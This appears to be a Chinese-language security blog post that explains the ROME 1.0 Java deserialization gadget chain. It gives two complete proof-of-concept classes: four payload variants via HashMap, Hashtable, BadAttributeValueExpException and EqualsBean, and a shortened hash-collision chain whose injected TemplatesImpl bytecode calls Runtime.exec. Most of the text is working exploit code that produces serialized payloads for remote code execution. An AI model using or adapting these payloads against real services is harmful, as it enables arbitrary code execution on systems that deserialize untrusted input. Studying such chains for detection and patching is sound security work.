Rome

前言

ROME is a Java framework for RSS and Atom feeds. It’s open source and licensed under the Apache 2.0 license.

ROME includes a set of parsers and generators for the various flavors of syndication feeds, as well as converters to convert from one format to another. The parsers can give you back Java objects that are either specific for the format you want to work with, or a generic normalized SyndFeed class that lets you work on with the data without bothering about the incoming or outgoing feed type.

依赖版本为rome 1.0。

前置知识

ObjectBean

com.sun.syndication.feed.impl.ObjectBean是Rome提供的一个封装类型，初始化时提供了一个Class类型和一个Object对象实例进行封装。ObjectBean也是使用委托模式设计的类，其中有三个成员变量，分别是EqualsBean/ToStringBean/CloneableBean类，这三个类为ObjectBean提供了equals、toString、clone以及hashCode方法。

跟进ObjectBean#hashCode方法，调用EqualsBean#beanHashCode方法，EqualsBean#beanHashCode方法会调用EqualsBean保存的参数_obj的toString方法，这个toString方法也就是触发利用链的地方。

ToStringBean

com.sun.syndication.feed.impl.ToStringBean是给对象提供toString方法的类，类中有两个toString方法，无参toString方法会获取调用链中上一个类或参数_obj中保存对象的类名，并调用有参toString方法。在有参toString方法中，会调用BeanIntrospector#getPropertyDescriptors方法来获取_beanClass的所有getter和setter方法，接着判断参数的长度，长度等于0的方法会使用_obj实例进行反射调用，通过这个点可以来触发TemplatesImpl的利用链。

利用构造

利用HashMap/Hashtable反序列化触发ObjectBean#hashCode方法，调用EqualsBean#beanHashCode方法，再调用ToStringBean#toString方法，触发TemplatesImpl的利用链。

除此之外，还可以利用CC链中的BadAttributeValueExpException直接去调用ToStringBean#toString方法，或者直接利用EqualsBean中#HashCode方法进行后续调用，绕开ObjectBean#hashCode方法。

POC

package org.example.deserialize.rome;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;
import javassist.ClassPool;
import javassist.CtClass;
import org.example.deserialize.commonscollections.Evil;

import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Hashtable;

public class RomeNormal {

    public static void main(String[] args) throws Exception {

        RomeNormal romeNormal = new RomeNormal();
        HashMap hashMap = romeNormal.payload1();
        Hashtable hashtable = romeNormal.payload2();
        BadAttributeValueExpException badAttributeValueExpException = romeNormal.payload3();
        HashMap hashMap1 = romeNormal.payload4();

        try {
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);
            outputStream.writeObject(hashMap1);
            System.out.println(Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray()).length());
            outputStream.flush();
            outputStream.close();

            ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
            ObjectInputStream inputStream = new ObjectInputStream(byteArrayInputStream);
            inputStream.readObject();
            inputStream.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }

    public Templates getTemplates() throws Exception {
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(Evil.class.getName());
        byte[] code = clazz.toBytecode();

        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_bytecodes", new byte[][] {code});
        setFieldValue(templates, "_name", "Evil");
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

        return templates;
    }


    public HashMap payload1() throws Exception {
        ObjectBean objectBean = new ObjectBean(Templates.class, getTemplates());
        ObjectBean objectBean1 = new ObjectBean(ObjectBean.class, new ObjectBean(String.class, "1"));

        HashMap<Object, Object> hashMap = new HashMap<>();
        hashMap.put(objectBean1, null);

        setFieldValue(objectBean1, "_equalsBean", new EqualsBean(ObjectBean.class, objectBean));

        return hashMap;
    }

    public Hashtable payload2() throws Exception {
        ObjectBean objectBean = new ObjectBean(Templates.class, getTemplates());
        ObjectBean objectBean1 = new ObjectBean(ObjectBean.class, new ObjectBean(String.class, "1"));

        Hashtable<Object, Object> hashtable = new Hashtable<>();
        hashtable.put(objectBean1, 1);

        setFieldValue(objectBean1, "_equalsBean", new EqualsBean(ObjectBean.class, objectBean));

        return hashtable;
    }

    public BadAttributeValueExpException payload3() throws Exception {
        ObjectBean objectBean = new ObjectBean(Templates.class, getTemplates());
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);

        setFieldValue(badAttributeValueExpException, "val", objectBean);

        return badAttributeValueExpException;
    }

    public HashMap payload4() throws Exception {
        ToStringBean toStringBean = new ToStringBean(Templates.class, getTemplates());
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class, new ToStringBean(System.class, "1"));

        HashMap<Object, Object> hashMap = new HashMap<>();
        hashMap.put(equalsBean, null);

        setFieldValue(equalsBean, "_obj", toStringBean);

        return hashMap;
    }
}

POC缩短

在上文的构造的POC中，调用链为：

HashMap/HashTable.readObject()
    ObjectBean.hashCode()
            EqualsBean.beanHashCode()
                ObjectBean.toString()
                    ToStringBean.toString()
                        TemplatesImpl.getOutputProperties()

在URLDNS链中，是利用HashMap反序列化时会调用equals方法或hashCode方法来实现的。注意到EqualsBean#beanEquals方法中也能实现ToStringBean#toString方法去调用TemplatesImpl#getOutputProperties方法，并且EqualsBean#beanEquals方法可以通过EqualsBean#equals方法来直接调用，那么能不能尝试利用HashMap反序列化时调用EqualsBean#equals方法来达成恶意利用呢？

答案显然是可以的，HashMap#putVal方法在解决哈希冲突问题时，会调用AbstractMap#equals方法，这里value如果为TemplatesImpl对象，即可实现调用。

那么还有没有哪里可以进一步缩短呢？答案是从TemplatesImpl入手，直接利用javassist去生成一个极简的恶意类。

package org.example.deserialize.rome;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;

import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;

public class RomeShort {

    public static void main(String[] args) throws Exception {

        ClassPool classPool = ClassPool.getDefault();
        CtClass clazz = classPool.makeClass("a");
        CtClass superClass = classPool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
        clazz.setSuperclass(superClass);
        CtConstructor ctConstructor = new CtConstructor(new CtClass[]{}, clazz);
        ctConstructor.setBody("Runtime.getRuntime().exec(\"open -a Calculator\");");
        clazz.addConstructor(ctConstructor);
        byte[][] bytes = new byte[][]{clazz.toBytecode()};

        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_bytecodes", bytes);
        setFieldValue(templates, "_name", "1");
        setFieldValue(templates, "_tfactory", null);

        EqualsBean equalsBean = new EqualsBean(String.class,"");
        HashMap map1 = new HashMap();
        HashMap map2 = new HashMap();
        map1.put("aa", templates);
        map1.put("bB", equalsBean);
        map2.put("aa", equalsBean);
        map2.put("bB", templates);
        HashMap hashMap = new HashMap();
        hashMap.put(map1,"");
        hashMap.put(map2,"");

        setFieldValue(equalsBean,"_beanClass", Templates.class);
        setFieldValue(equalsBean,"_obj", templates);

        try {
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);
            outputStream.writeObject(hashMap);
            outputStream.flush();
            outputStream.close();
            System.out.println(new String(Base64.getEncoder().encode(byteArrayOutputStream.toByteArray())));
            System.out.println(new String(Base64.getEncoder().encode(byteArrayOutputStream.toByteArray())).length());

            ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
            ObjectInputStream inputStream = new ObjectInputStream(byteArrayInputStream);
            inputStream.readObject();
            inputStream.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }
}